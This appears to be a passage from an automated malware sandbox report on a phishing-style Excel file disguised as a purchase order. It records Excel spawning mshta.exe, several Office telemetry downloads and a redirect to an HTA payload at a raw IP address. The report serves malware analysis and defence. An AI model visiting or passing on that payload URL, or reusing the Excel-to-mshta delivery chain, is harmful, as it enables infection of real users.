                            2025-03-17 08:29:08 UTC117INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 39 2e 32 34 2f 78 61 6d 70 70 2f 61 6e 67 65 6c 2f 74 73 67 72 65 61 74 6e 65 73 73 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 6f 6f 64 67 69 72 6c 73 68 65 69 73 2e 68 74 61 3f 26 62 61 6c 69 6e 65 73 65 3d 73 74 65 72 65 6f 74 79 70 65 64
                            Data Ascii: Found. Redirecting to http://198.12.89.24/xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.74970113.107.246.604436784C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-17 08:29:23 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-17 08:29:23 UTC500INHTTP/1.1 200 OK
                            Date: Mon, 17 Mar 2025 08:29:23 GMT
                            Content-Type: text/plain
                            Content-Length: 1114783
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Last-Modified: Mon, 17 Mar 2025 00:15:55 GMT
                            ETag: "0x8DD64E8E2A782F5"
                            x-ms-request-id: 2689232f-001e-0082-4716-975880000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250317T082923Z-186895dd8bdkvr8rhC1EWR0teg00000003fg000000002c6g
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T2
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-03-17 08:29:23 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                            Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                            2025-03-17 08:29:23 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
                            Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
                            2025-03-17 08:29:23 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
                            Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
                            2025-03-17 08:29:24 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
                            2025-03-17 08:29:24 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
                            Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
                            2025-03-17 08:29:24 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
                            Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
                            2025-03-17 08:29:24 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
                            Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
                            2025-03-17 08:29:24 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
                            2025-03-17 08:29:24 UTC16384INData Raw: 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70
                            Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
                            2025-03-17 08:29:24 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c
                            Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.74970413.107.246.604436784C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-17 08:29:30 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-17 08:29:30 UTC498INHTTP/1.1 200 OK
                            Date: Mon, 17 Mar 2025 08:29:30 GMT
                            Content-Type: text/xml
                            Content-Length: 204
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6C8527A"
                            x-ms-request-id: 7f2185fb-401e-0015-4016-970e8d000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250317T082930Z-186895dd8bdwwt8hhC1EWR4xag00000005g0000000004ny4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T2
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-03-17 08:29:30 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.74970313.107.246.604436784C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-17 08:29:30 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-17 08:29:30 UTC522INHTTP/1.1 200 OK
                            Date: Mon, 17 Mar 2025 08:29:30 GMT
                            Content-Type: text/xml
                            Content-Length: 2128
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                            ETag: "0x8DC582BA41F3C62"
                            x-ms-request-id: 34637610-b01e-0001-0dfd-9646e2000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250317T082930Z-186895dd8bdh8h7whC1EWRqw7s000000066g00000000349z
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T1
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-03-17 08:29:30 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                            Statistics

                            CPU Usage

                            050100s020406080100

                            Click to jump to process

                            Memory Usage

                            050100s0.0050100150200MB

                            Click to jump to process

                            High Level Behavior Distribution

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:04:28:14
                            Start date:17/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0xfb0000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:11
                            Start time:04:29:08
                            Start date:17/03/2025
                            Path:C:\Windows\SysWOW64\mshta.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                            Imagebase:0xd60000
                            File size:13'312 bytes
                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:13
                            Start time:04:29:17
                            Start date:17/03/2025
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6006a0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:15
                            Start time:04:29:26
                            Start date:17/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
                            Imagebase:0xfb0000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Disassembly

                            Code Analysis

                            Call Graph

                            Hide Legend
                            • Entrypoint
                            • Decryption Function
                            • Executed
                            • Not Executed
                            • Show Help
                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet1"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet2"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet3

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet3"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisWorkbook"

                            2

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True